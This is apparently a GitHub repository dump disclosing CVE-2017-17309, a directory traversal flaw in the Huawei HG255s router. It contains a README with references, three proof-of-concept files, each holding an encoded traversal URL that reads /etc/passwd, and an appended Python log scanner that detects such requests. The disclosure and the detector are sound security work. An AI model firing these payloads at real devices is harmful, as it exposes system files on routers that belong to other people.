├── .github
    └── FUNDING.yml
├── LICENSE
├── README.md
├── exploit
    ├── huawei_hg255_exploit_1.txt
    ├── huawei_hg255_exploit_2.txt
    └── huawei_hg255_exploit_3.txt
└── tools
    ├── .travis.yml
    └── hg255s_attack.py

/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: ismailtasdelen
patreon: ismailtasdelen
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: ismailtasdelen
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 İSMAİL TAŞDELEN

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
### Server Directory Traversal at Huawei HG255s - CVE-2017-17309

![huawei](https://user-images.githubusercontent.com/15425071/31989903-489b48fa-b97c-11e7-8698-ea794276d08a.png)

##### Letter of Thanks

![letterofthanks](https://user-images.githubusercontent.com/15425071/31990117-d75894e4-b97c-11e7-8275-6909a6b47b48.png)

#### Exploit Title: [Server Directory Traversal at Huawei HG255s]

#### Exploit Author: [Ismail Tasdelen]

#### CVE: CVE-2017-17309

#### Vendor Homepage: [[www.huawei.com](https://www.huawei.com)]

#### Software Link: [Not published; this modem is used only in Turkey]

#### Version: [V100R001C163B025SP02]

![cve-2017-17309](https://user-images.githubusercontent.com/15425071/39086966-c989b58a-45a1-11e8-9a7e-abbb34393ba9.PNG)

##### Finding Vulnerabilities and Approved Exploits

* [Server Directory Traversal at Huawei HG255s - 1](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_1.txt)

* [Server Directory Traversal at Huawei HG255s - 2](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_2.txt)

* [Server Directory Traversal at Huawei HG255s - 3](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_3.txt)

##### References

* https://www.vulnerability-lab.com/get_content.php?id=2099
* https://www.vulnerability-lab.com/get_content.php?id=2100
* https://cxsecurity.com/issue/WLB-2017120035
* https://hackertor.com/2017/12/06/huawei-hg255s-server-directory-traversal/
* https://www.exploit-database.net/?id=94806
* https://github.com/ismailtasdelen/huawei_hg255s_exploit
* http://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en
* https://nvd.nist.gov/vuln/detail/CVE-2017-17309
* https://www.cvedetails.com/cve/CVE-2017-17309/
* https://vuldb.com/?id.119545
* https://vulners.com/cve/CVE-2017-17309
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17309

--------------------------------------------------------------------------------
/exploit/huawei_hg255_exploit_1.txt:
--------------------------------------------------------------------------------
# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [20.10.2017]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published; this modem is used only in Turkey]

# Version: [V100R001C163B025SP02]

# POC:

https://www.youtube.com/watch?v=sWf-at_CqtQ

Directory Traversal Payload : http://192.168.0.1/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

# Do you want to follow my activity?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen

--------------------------------------------------------------------------------
/exploit/huawei_hg255_exploit_2.txt:
--------------------------------------------------------------------------------
# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [22.10.2017]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published; this modem is used only in Turkey]

# Version: [V100R001C163B025SP02]

# POC:

https://www.youtube.com/watch?v=KqFEW2bG7ls

Directory Traversal Payload : http://192.168.0.1/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

# Do you want to follow my activity?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen

--------------------------------------------------------------------------------
/exploit/huawei_hg255_exploit_3.txt:
--------------------------------------------------------------------------------
# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [22.10.2017]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published; this modem is used only in Turkey]

# Version: [V100R001C163B025SP02]

# POC:

https://www.youtube.com/watch?v=h5235yF993o

Directory Traversal Payload : http://192.168.0.1/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

# Do you want to follow my activity?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen

--------------------------------------------------------------------------------
/tools/.travis.yml:
--------------------------------------------------------------------------------
language: python
python:
  - "3.4"
  - "3.5"
  - "3.6"
# command to install dependencies
install:
  - pip install .
# command to run tests
script:
  - pytest tests/*.py

--------------------------------------------------------------------------------
/tools/hg255s_attack.py:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
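
The three payloads in the exploit files share one shape: a static directory (`/js/`, `/lib/`, `/res/`) followed by a run of `..%2f` sequences. The following is an added example, not code from this repository: a defender-side check that decodes each logged request path and reports requests that climb above the web root. The log format, client addresses, timestamps, status codes and function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (assumed common log format). The first three
# request paths are the payloads from the exploit files; the rest are benign.
T = "..%2f" * 8 + "etc/passwd"
SAMPLE_LOG = "\n".join([
    f'192.168.0.23 - - [20/Oct/2017:10:01:02 +0300] "GET /js/{T} HTTP/1.1" 200 512',
    f'192.168.0.23 - - [22/Oct/2017:09:14:40 +0300] "GET /lib/{T} HTTP/1.1" 200 512',
    f'192.168.0.23 - - [22/Oct/2017:09:15:07 +0300] "GET /res/{T} HTTP/1.1" 404 0',
    '192.168.0.42 - - [22/Oct/2017:09:16:30 +0300] "GET /js/app.js HTTP/1.1" 200 9031',
    '192.168.0.42 - - [22/Oct/2017:09:16:31 +0300] "GET /res/img/../logo.png HTTP/1.1" 200 744',
])
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so nested encodings are unmasked too."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def levels_above_root(target):
    """How far the decoded path climbs above the web root (0 = stays inside)."""
    path = decode_fully(urlsplit(target).path).replace("\\", "/")
    depth = lowest = 0
    for segment in path.split("/"):
        if segment == "..":
            depth -= 1
            lowest = min(lowest, depth)
        elif segment not in ("", "."):
            depth += 1
    return -lowest

def scan(log_text):
    """Return (client, raw_target, levels, status) for each escaping request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and (levels := levels_above_root(m.group(2))):
            hits.append((m.group(1), m.group(2), levels, int(m.group(3))))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that was answered with status 200 deserves priority in triage, since the server returned content for a path outside the web root.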